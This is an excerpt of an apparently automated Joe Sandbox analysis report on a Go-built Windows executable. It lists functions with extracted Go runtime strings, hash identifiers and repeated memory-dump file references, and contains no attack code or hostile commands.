              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: -$-$-$-
              • API String ID: 0-1033403326
              • Opcode ID: 362c79a51292aff176cd86cc48c49f7d89cf48f9c2530b3211df37308783cf0b
              • Instruction ID: 5c5debbbbc7bbd5074b85e4abd3abc63b400b0504759852aa4a23faf3098c528
              • Opcode Fuzzy Hash: 362c79a51292aff176cd86cc48c49f7d89cf48f9c2530b3211df37308783cf0b
              • Instruction Fuzzy Hash: EA51C3B26497564FD715CE28985032EBBD1AB90348F48462DD8948B3D2E7BD8A0D87C2
              Function 007E0DD0 Relevance: 5.1, Strings: 4, Instructions: 135COMMON
              Download Yara Rule
              Strings
              • ]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltPUTKeyTags3-): subHanLaoMroNk, xrefs: 007E0E26
              • 2, xrefs: 007E0EFD
              • ...additional frames elided...unsafe.String: len out of rangecannot assign requested address.lib section in a.out corruptedW. Central Africa Standard TimeCentral Brazilian Standard TimeMountain Standard Time (Mexico)wmi: create object returned nilcannot send , xrefs: 007E0F09
              • [originating from goroutine file descriptor in bad statedestination address requiredprotocol driver not attachedCertCreateCertificateContextCanada Central Standard TimeCen. Australia Standard TimeAus Central W. Standard TimeCentral Europe Standard TimeEnglish , xrefs: 007E0DFC
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: ...additional frames elided...unsafe.String: len out of rangecannot assign requested address.lib section in a.out corruptedW. Central Africa Standard TimeCentral Brazilian Standard TimeMountain Standard Time (Mexico)wmi: create object returned nilcannot send $2$[originating from goroutine file descriptor in bad statedestination address requiredprotocol driver not attachedCertCreateCertificateContextCanada Central Standard TimeCen. Australia Standard TimeAus Central W. Standard TimeCentral Europe Standard TimeEnglish $]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltPUTKeyTags3-): subHanLaoMroNk
              • API String ID: 0-2342688139
              • Opcode ID: 5bc0c19ac135a8c81000fbf27f3adc9bd1afa1d50763ad47ea0f2d4aa9fa756f
              • Instruction ID: 10923f105c342c271e1db5267919e2ce6510a561d05e4858d4eca93dbb07a296
              • Opcode Fuzzy Hash: 5bc0c19ac135a8c81000fbf27f3adc9bd1afa1d50763ad47ea0f2d4aa9fa756f
              • Instruction Fuzzy Hash: 9151EF7460D381CFC315EF6AC195A1EBBE1AF89704F04882DF48887352DB78D948CB92
              Function 00795FF0 Relevance: 5.1, Strings: 4, Instructions: 121COMMON
              Download Yara Rule
              Strings
              • out of memory is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=, xrefs: 00796143
              • runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: invalid p statecheckdead:, xrefs: 007960E5, 00796165
              • runtime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: spl, xrefs: 007961C3
              • bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: , xrefs: 0079610F, 0079618F
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: $out of memory is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=$runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: invalid p statecheckdead:$runtime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: spl
              • API String ID: 0-82273310
              • Opcode ID: 80c4ab0ec499417c7057f30706c88ff1e27b440ba3ce8c395b7e9b80cfab8702
              • Instruction ID: c145686742a9dbebc4e3eb2019d6ea3139ca3c423ae892eba0bde62474bed274
              • Opcode Fuzzy Hash: 80c4ab0ec499417c7057f30706c88ff1e27b440ba3ce8c395b7e9b80cfab8702
              • Instruction Fuzzy Hash: 1D51D3B4209745DFC745EF68D099B6EBBE0BB88344F40892DE48983345EB789988DF53
              Function 007D3540 Relevance: 5.1, Strings: 4, Instructions: 105COMMON
              Download Yara Rule
              Strings
              • shrinking stack in libcallruntime: pcHeader: magic= traceRegion: out of memoryinvalid request descriptorno CSI structure availablerequired key not availableno message of desired typename not unique on networkCertFreeCertificateContextPostQueuedCompletionStatus, xrefs: 007D3659
              • bad status in shrinkstackmissing traceGCSweepStartresource deadlock avoidedoperation now in progressno buffer space availableno such device or addresssocket type not supportedinvalid cross-device linkGetFinalPathNameByHandleWGetQueuedCompletionStatusUpdateProc, xrefs: 007D3685
              • missing stack in shrinkstack args stack map entries for invalid runtime symbol tableruntime: no module data for traceRegion: alloc too large[originating from goroutine file descriptor in bad statedestination address requiredprotocol driver not attachedCertCrea, xrefs: 007D369B
              • shrinkstack at bad timereflect.methodValueCalldevice or resource busyinterrupted system callno space left on deviceoperation not supportedoperation not permittedCertGetCertificateChainFreeEnvironmentStringsWGetEnvironmentVariableWGetSystemTimeAsFileTimeSetEnvi, xrefs: 007D366F
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: bad status in shrinkstackmissing traceGCSweepStartresource deadlock avoidedoperation now in progressno buffer space availableno such device or addresssocket type not supportedinvalid cross-device linkGetFinalPathNameByHandleWGetQueuedCompletionStatusUpdateProc$missing stack in shrinkstack args stack map entries for invalid runtime symbol tableruntime: no module data for traceRegion: alloc too large[originating from goroutine file descriptor in bad statedestination address requiredprotocol driver not attachedCertCrea$shrinking stack in libcallruntime: pcHeader: magic= traceRegion: out of memoryinvalid request descriptorno CSI structure availablerequired key not availableno message of desired typename not unique on networkCertFreeCertificateContextPostQueuedCompletionStatus$shrinkstack at bad timereflect.methodValueCalldevice or resource busyinterrupted system callno space left on deviceoperation not supportedoperation not permittedCertGetCertificateChainFreeEnvironmentStringsWGetEnvironmentVariableWGetSystemTimeAsFileTimeSetEnvi
              • API String ID: 0-2613220513
              • Opcode ID: 4b5cb188180cef8fe0f82a887e8814cf177223503bf5384a810d9446f56c0025
              • Instruction ID: 5c13c98e52ba634a57836f7745937742c1b269dbacb0c8af4931989013fe4f47
              • Opcode Fuzzy Hash: 4b5cb188180cef8fe0f82a887e8814cf177223503bf5384a810d9446f56c0025
              • Instruction Fuzzy Hash: A7419974604340DFCB18EF24D099A6973F1FB88704F54486EE8998B361E738EA48DB13
              Function 007ACAB0 Relevance: 5.1, Strings: 4, Instructions: 95COMMON
              Download Yara Rule
              Strings
              • root level max pages doesn't fit in summaryruntime: releaseSudog with non-nil gp.paramunknown runnable goroutine during bootstrapruntime: casfrom_Gscanstatus bad oldval gp=runtime:stoplockedm: lockedg (atomicstatus=methodValueCallFrameObjs is not in a modulein, xrefs: 007ACC23
              • +, xrefs: 007ACC2C
              • runtime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=timeBegin/EndPeriod not foundruntime: sudog with non-nil cgfput: bad status (not Gdead)LockOSThread nesting overflowsemacquire not on the G stackruntime: split stack overflo, xrefs: 007ACBEF
              • runtime: root level max pages = WSAGetOverlappedResult not found_cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runt, xrefs: 007ACBA9
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: +$root level max pages doesn't fit in summaryruntime: releaseSudog with non-nil gp.paramunknown runnable goroutine during bootstrapruntime: casfrom_Gscanstatus bad oldval gp=runtime:stoplockedm: lockedg (atomicstatus=methodValueCallFrameObjs is not in a modulein$runtime: root level max pages = WSAGetOverlappedResult not found_cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runt$runtime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=timeBegin/EndPeriod not foundruntime: sudog with non-nil cgfput: bad status (not Gdead)LockOSThread nesting overflowsemacquire not on the G stackruntime: split stack overflo
              • API String ID: 0-1754101818
              • Opcode ID: 495843d7eca92166287f907aebe12d45be6f308c1e844510f40388d31262ea06
              • Instruction ID: 63b2aa1353864c4f14eb46d45e33ea29acc5a83cc1fdaa02b0638c3e03ef9458
              • Opcode Fuzzy Hash: 495843d7eca92166287f907aebe12d45be6f308c1e844510f40388d31262ea06
              • Instruction Fuzzy Hash: 364148B0508345DFD309EF24C099BAEBBE0BF89304F05896DE88987352D739D944DB62
              Function 00795E90 Relevance: 5.1, Strings: 4, Instructions: 88COMMON
              Download Yara Rule
              Strings
              • !, xrefs: 00795FD2
              • bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: , xrefs: 00795F95
              • runtime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:sec, xrefs: 00795FC9
              • runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAdd, xrefs: 00795F6B
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
